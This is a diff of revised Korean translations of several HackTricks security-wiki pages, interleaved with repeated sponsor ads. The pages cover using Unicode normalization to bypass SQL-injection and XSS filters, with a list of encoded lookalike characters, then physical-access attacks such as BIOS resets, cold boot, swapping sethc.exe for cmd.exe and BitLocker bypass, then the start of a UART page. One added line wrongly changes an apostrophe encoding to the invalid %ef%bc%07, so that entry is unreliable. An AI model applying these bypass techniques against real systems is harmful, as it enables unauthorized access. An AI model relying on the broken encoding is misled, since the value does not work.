<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **도난당한 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취와 랜섬웨어 공격에 대항하는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>와 함께 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* **사이버 보안 회사**에서 일하시나요? **HackTricks에 귀사를 광고하고 싶으신가요**? 또는 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드**하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **사이버 보안 회사에서 일하시나요? 귀하의 회사가 HackTricks에서 광고되길 원하시나요? 또는 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 받으세요
* [**💬**](https://emojipedia.org/speech-balloon/) **Discord 그룹**에 **가입**하거나 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **트위터** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **해킹 트릭을 공유하고 싶으시다면** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **로 PR을 제출**하세요.
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요
* **[💬](https://emojipedia.org/speech-balloon/) [Discord 그룹](https://discord.gg/hRep4RUj7f)에 가입하거나 [텔레그램 그룹](https://t.me/peass)에 참여하거나 Twitter에서 저를 팔로우하세요 🐦[@carlospolopm](https://twitter.com/hacktricks_live)**
* **[hacktricks repo](https://github.com/carlospolop/hacktricks) 및 [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)에 PR을 제출하여 해킹 요령을 공유하세요**
</details>

View file

@ -9,18 +9,18 @@ HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고**하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 얻으세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)**에 가입하거나 [텔레그램 그룹](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**** **팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)**다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
@ -35,7 +35,7 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
유니코드 정규화는 문자의 서로 다른 이진 표현이 동일한 이진 값으로 표준화되도록 하는 프로세스입니다. 이 프로세스는 프로그래밍 및 데이터 처리에서 문자열을 다룰 때 중요합니다. 유니코드 표준은 두 가지 유형의 문자 동등성을 정의합니다:
1. **정규 동등성**: 문자가 인쇄되거나 표시될 때 동일한 모양과 의미를 가지면 정규적으로 동등하다고 간주됩니다.
2. **호환 동등성**: 문자가 같은 추상적인 문자를 나타낼 수 있지만 다르게 표시될 수 있는 더 약한 형태의 동등성입니다.
2. **호환 동등성**: 문자가 동일한 추상 문자를 나타낼 수 있지만 다르게 표시될 수 있는 더 약한 동등성입니다.
**네 가지 유니코드 정규화 알고리즘**이 있습니다: NFC, NFD, NFKC 및 NFKD. 각 알고리즘은 정규 및 호환 정규화 기술을 다르게 적용합니다. 더 자세한 이해를 위해 [Unicode.org](https://unicode.org/)에서 이러한 기술을 탐색할 수 있습니다.
@ -44,14 +44,14 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
특히 다른 시스템이나 언어 간의 상호 운용성 문제를 다룰 때 유니코드 인코딩을 이해하는 것이 중요합니다. 주요 요점은 다음과 같습니다:
* **코드 포인트 및 문자**: 유니코드에서 각 문자나 기호는 "코드 포인트"라고 하는 숫자 값이 할당됩니다.
* **바이트 표현**: 코드 포인트(또는 문자)는 메모리에서 하나 이상의 바이트로 표시됩니다. 예를 들어, 영어권 국가에서 일반적인 LATIN-1 문자는 하나의 바이트를 사용하여 표시됩니다. 그러나 더 많은 문자 집합을 갖는 언어는 표현에 더 많은 바이트가 필요합니다.
* **인코딩**: 이 용어는 문자가 일련의 바이트로 변환되는 방식을 의미합니다. ASCII 문자는 하나의 바이트로 표시되며, 다른 문자에는 최대 네 바이트까지 사용됩니다.
* **바이트 표현**: 코드 포인트(또는 문자)는 메모리에서 하나 이상의 바이트로 표시됩니다. 예를 들어, 영어권 국가에서 일반적인 LATIN-1 문자는 하나의 바이트를 사용하여 표시됩니다. 그러나 더 많은 문자 집합을 가진 언어는 표시에 더 많은 바이트가 필요합니다.
* **인코딩**: 이 용어는 문자가 일련의 바이트로 변환되는 방식을 의미합니다. ASCII 문자는 1바이트로 표시되고, 다른 문자에는 최대 4바이트까지 사용되는 널리 쓰이는 인코딩 표준인 UTF-8이 있습니다.
* **데이터 처리**: 데이터를 처리하는 시스템은 바이트 스트림을 문자로 올바르게 변환하기 위해 사용된 인코딩을 알아야 합니다.
* **UTF의 변형**: UTF-8 외에도 UTF-16(최소 2바이트, 최대 4바이트 사용) 및 UTF-32(모든 문자에 4바이트 사용)와 같은 다른 인코딩 표준이 있습니다.
* **UTF의 변형**: UTF-8 외에도 최소 2바이트부터 최대 4바이트까지 사용하는 UTF-16 및 모든 문자에 4바이트를 사용하는 UTF-32와 같은 다른 인코딩 표준이 있습니다.
이러한 개념을 이해하여 유니코드의 복잡성 및 다양한 인코딩 방법에서 발생할 수 있는 잠재적인 문제를 효과적으로 처리하고 완화하는 것이 중요합니다.
유니코드의 복잡성 및 다양한 인코딩 방법에서 발생할 수 있는 잠재적인 문제를 효과적으로 처리하고 완화하기 위해 이러한 개념을 이해하는 것이 중요합니다.
두 개의 다른 바이트를 표현하는 유니코드를 정규화하는 예시:
유니코드가 동일한 문자를 나타내는 두 가지 다른 바이트를 어떻게 정규화하는지의 예시:
```python
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
```
@ -59,17 +59,17 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
### 발견
앱 내에서 에코되는 값이 발견된다면, **'KELVIN SIGN' (U+0212A)**을 보낼 수 있습니다. 이는 **"K"로 정규화**됩니다 ( `%e2%84%aa`로 보낼 수 있음). **"K"가 에코되면**, 어떤 종류의 **유니코드 정규화**가 수행 중입니다.
웹앱 내에서 에코되는 값이 발견된다면, **'KELVIN SIGN' (U+0212A)**을 보낼 수 있습니다. 이는 **"K"로 정규화**됩니다 (이를 `%e2%84%aa`로 보낼 수 있습니다). **"K"가 에코되면**, 어떤 종류의 **유니코드 정규화**가 수행 중입니다.
다른 **예시**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83`**유니코드** 후에`Leonishan`이 됩니다.
다른 **예시**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83`**유니코드** 후에 `Leonishan`으로 정규화합니다.
## **취약한 예시**
### **SQL Injection 필터 우회**
사용자 입력을 사용하여 SQL 쿼리를 만들 때 문자 `'`를 사용하는 웹 페이지를 상상해보십시오. 이 웹은 보안 조치로 사용자 입력에서 문자 `'`의 모든 발생을 **삭제**하지만 ** 삭제 후** 및 **쿼리 생성 전**에 사용자 입력을 **유니코드**로 **정규화**합니다.
사용자 입력으로 SQL 쿼리를 만들기 위해 문자 `'`를 사용하는 웹 페이지를 상상해보십시오. 이 웹은 보안 조치로 사용자 입력에서 문자 `'`의 모든 발생을 **삭제**하지만 **해당 삭제 후** 및 **쿼리 생성 전**에 사용자 입력을 **유니코드**로 **정규화**합니다.
런 다음, 악의적인 사용자는 `%ef%bc%87`와 같이 `' (0x27)`에 해당하는 다른 유니코드 문자를 삽입할 수 있습니다. 입력이 정규화되면 단일 인용부호가 생성되고 **SQLInjection 취약점**이 나타납니다:
럼 악의적인 사용자는 `%ef%bc%87`와 같은 `' (0x27)`에 해당하는 다른 유니코드 문자를 삽입할 수 있습니다. 입력이 정규화되면, 작은 따옴표가 생성되고 **SQLInjection 취약점**이 나타납니다:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
@ -83,7 +83,7 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
* `-`-- %ef%b9%a3
* `#`-- %ef%b9%9f
* `*`-- %ef%b9%a1
* `'` -- %ef%bc%87
* `'` -- %ef%bc%07
* `"` -- %ef%bc%82
* `|` -- %ef%bd%9c
```
@ -103,21 +103,21 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
{% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %}
### XSS (Cross Site Scripting)
### XSS (크로스 사이트 스크립팅)
웹앱을 속이고 XSS를 악용하기 위해 다음 문자 중 하나를 사용할 수 있습니다:
다음 문자 중 하나를 사용하여 웹앱을 속일 수 있고 XSS를 악용할 수 있습니다:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
예를 들어, 제안된 첫 번째 Unicode 문자는 `%e2%89%ae` 또는 `%u226e`로 전송될 수 있습니다.
예를 들어, 제안된 첫 번째 유니코드 문자는 `%e2%89%ae` 또는 `%u226e`로 전송될 수 있습니다.
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
### Fuzzing Regexes
### Regex 퍼징
백엔드가 **정규식으로 사용자 입력을 확인**할 때, **입력**이 **정규식을 위해 정규화**되지만 **사용되는 곳**에는 **정규화되지 않을 수 있습니다**. 예를 들어, Open Redirect 또는 SSRF에서 정규식은 **전송된 URL을 정규화**하지만 그 후에는 **원래 그대로 액세스**할 수 있습니다.
백엔드가 **정규식으로 사용자 입력을 확인**할 때, **입력**이 **정규식에 대해 정규화**되지만 **사용되는 곳에 대해 정규화되지 않을 수 있습니다**. 예를 들어, Open Redirect 또는 SSRF에서 정규식은 **전송된 URL을 정규화**하지만 그 후에는 **원래 그대로 액세스**할 수 있습니다.
도구 [**recollapse**](https://github.com/0xacb/recollapse)은 백엔드를 fuzz하기 위해 **입력의 변형을 생성**할 수 있습니다. 자세한 정보는 **github** 및 이 [**포스트**](https://0xacb.com/2022/11/21/recollapse/)를 확인하십시오.
도구 [**recollapse**](https://github.com/0xacb/recollapse)는 백엔드를 퍼징하기 위해 **입력의 변형을 생성**할 수 있습니다. 자세한 정보는 **github** 및 이 [**포스트**](https://0xacb.com/2022/11/21/recollapse/)를 확인하세요.
## 참고 자료
@ -125,28 +125,28 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 하는 검색 엔진으로, 회사나 그 고객이 **stealer malwares**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 통해 제공되는 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격에 대항하는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
그들의 웹사이트를 확인하고 무료로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>제로부터 영웅이 될 때까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 얻으세요
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)에 가입하거나 [텔레그램 그룹](https://t.me/peass)에 가입하거나** **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우하세요.**
* **HackTricks 및 HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유하세요**.
* **HackTricks 및 HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,27 +2,27 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소로 **PR 제출**을 통해 해킹 트릭을 공유하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -30,7 +30,7 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한
## BIOS 비밀번호 복구 및 시스템 보안
**BIOS 재설정**은 여러 가지 방법으로 수행할 수 있습니다. 대부분의 메인보드에는 **배터리**가 포함되어 있어 약 **30분 동안 제거**하면 BIOS 설정과 비밀번호가 재설정됩니다. 또한, 메인보드의 **점퍼**를 조정하여 특정 핀을 연결하여 이러한 설정을 재설정할 수 있습니다.
**BIOS 재설정**은 여러 가지 방법으로 수행할 수 있습니다. 대부분의 메인보드에는 **배터리**가 포함되어 있어 약 **30분 동안 제거**하면 BIOS 설정과 비밀번호를 재설정할 수 있습니다. 또한, 메인보드의 **점퍼**를 조정하여 특정 핀을 연결하여 이러한 설정을 재설정할 수 있습니다.
하드웨어 조정이 불가능하거나 실용적이지 않은 상황에서는 **소프트웨어 도구**가 해결책을 제공합니다. **Kali Linux**와 같은 배포판을 사용하여 **라이브 CD/USB**에서 시스템을 실행하면 **_killCmos_** 및 **_CmosPWD_**와 같은 도구에 액세스하여 BIOS 비밀번호를 복구할 수 있습니다.
@ -44,7 +44,7 @@ BIOS 비밀번호를 모르는 경우, 세 번 **잘못 입력**하면 일반적
### RAM 분석 및 Cold Boot 공격
RAM은 전원이 차단된 후 일반적으로 **1~2분 동안** 데이터를 보존합니다. 이 지속 시간을 **액체 질소**와 같은 냉각 물질을 적용하여 **10분까지** 연장할 수 있습니다. 이 확장된 기간 동안 **dd.exe** 및 **volatility**와 같은 도구를 사용하여 **메모리 덤프**를 생성하여 분석할 수 있습니다.
RAM은 전원이 차단된 후 일반적으로 **1~2분 동안** 데이터를 유지합니다. 이 지속 시간을 연장하기 위해 액체 질소와 같은 냉각 물질을 적용하면 **10분까지** 데이터를 유지할 수 있습니다. 이 확장된 기간 동안 **dd.exe** 및 **volatility**와 같은 도구를 사용하여 **메모리 덤프**를 생성하여 분석할 수 있습니다.
### 직접 메모리 액세스 (DMA) 공격
@ -54,7 +54,7 @@ RAM은 전원이 차단된 후 일반적으로 **1~2분 동안** 데이터를
**_sethc.exe_** 또는 **_Utilman.exe_**와 같은 시스템 이진 파일을 **_cmd.exe_**의 사본으로 변경하면 시스템 권한이 있는 명령 프롬프트를 제공할 수 있습니다. **chntpw**와 같은 도구를 사용하여 Windows 설치의 **SAM** 파일을 편집하여 비밀번호를 변경할 수 있습니다.
**Kon-Boot**은 Windows 시스템에 로그인하는 데 비밀번호를 알지 못해도 일시적으로 Windows 커널이나 UEFI를 수정하여 지원하는 도구입니다. 자세한 정보는 [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)에서 확인할 수 있습니다.
**Kon-Boot**은 Windows 시스템에 로그인하는 데 비밀번호를 알지 못해도 일시적으로 Windows 커널이나 UEFI를 수정하여 도와주는 도구입니다. 자세한 정보는 [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)에서 확인할 수 있습니다.
### Windows 보안 기능 다루기
@ -66,16 +66,42 @@ RAM은 전원이 차단된 후 일반적으로 **1~2분 동안** 데이터를
#### BAD USB 장치
**Rubber Ducky** 및 **Teensyduino**와 같은 장치는 대상 컴퓨터에 연결될 때 미리 정의된 페이로드를 실행할 수 있는 **bad USB** 장치의 플랫폼으로 작동합니다.
**Rubber Ducky** 및 **Teensyduino**와 같은 장치는 **bad USB** 장치를 만들어 타겟 컴퓨터에 연결될 때 미리 정의된 페이로드를 실행할 수 있는 플랫폼으로 작동합니다.
#### 볼륨 그림자 복사
관리자 권한을 사용하 PowerShell을 통해 **SAM** 파일을 포함한 민감한 파일의 사본을 생성할 수 있습니다.
관리자 권한을 사용하 PowerShell을 통해 **SAM** 파일을 포함한 민감한 파일의 사본을 생성할 수 있습니다.
### BitLocker 암호 우회
BitLocker 암호화는 메모리 덤프 파일 (**MEMORY.DMP**) 내에서 **복구 비밀번호**를 찾으면 우회 수 있습니다. **Elcomsoft Forensic Disk Decryptor** 또는 **Passware Kit Forensic**와 같은 도구를 사용하여 이를 수행할 수 있습니다.
BitLocker 암호화는 메모리 덤프 파일 (**MEMORY.DMP**) 내에서 **복구 비밀번호**를 찾으면 우회 수 있습니다. **Elcomsoft Forensic Disk Decryptor** 또는 **Passware Kit Forensic**와 같은 도구를 사용하여 이를 수행할 수 있습니다.
### 복구 키 추가를 위한 사회 공학
사용자를 설득하여 새로운 BitLocker 복구 키를 추가할 수 있습니다. 이를 통해 새로운 복구 키를 추가하여 복호화 프로세스를 간단화할 수 있습니다.
사용자를 설득하여 새로운 BitLocker 복구 키를 추가할 수 있으며, 이를 통해 새로운 복구 키를 추가하여 복호화 프로세스를 간단화할 수 있습니다.
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 제로에서 영웅까지 AWS 해킹 배우기</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
@ -10,19 +10,19 @@ HackTricks를 지원하는 다른 방법:
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **다음을 통해 참여하세요** 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass) 또는 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우하세요**.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 귀하의 해킹 기술을 공유하세요.
* **해킹 트릭을 공유하세요** PR을 제출하여 [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 무료로 엔진을 시해 볼 수 있습니다:
그들의 웹사이트를 확인하고 무료로 엔진을 시해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -30,11 +30,11 @@ WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈
## 기본 정보
UART는 시리얼 프로토콜로, 구성 요소 간에 데이터를 한 번에 한 비트씩 전송합니다. 반면에 병렬 통신 프로토콜은 여러 채널을 통해 동시에 데이터를 전송합니다. 일반적인 시리얼 프로토콜에는 RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express 및 USB가 포함됩니다.
UART는 데이터를 한 번에 한 비트씩 컴포넌트 간에 전송하는 직렬 프로토콜입니다. 반면에 병렬 통신 프로토콜은 여러 채널을 통해 동시에 데이터를 전송합니다. 일반적인 직렬 프로토콜에는 RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express 및 USB가 포함됩니다.
일반적으로 UART가 대기 상태일 때 라인은 높은 상태(논리 1 값)를 유지합니다. 그런 다음, 송신기가 수신기에 시작 비트를 보내어 데이터 전송의 시작을 신호합니다. 이 동안 신호는 낮은 상태(논리 0 값)를 유지합니다. 그 다음, 송신기는 실제 메시지를 포함하는 다섯 개에서 여덟 개의 데이터 비트를 보내고, 선택적으로 패리티 비트와 논리 1 값을 가진 하나 또는 두 개의 스톱 비트를 보냅니다. 오류 확인에 사용되는 패리티 비트는 실제로는 거의 보이지 않습니다. 스톱 비트(또는 비트)는 전송의 끝을 나타냅니다.
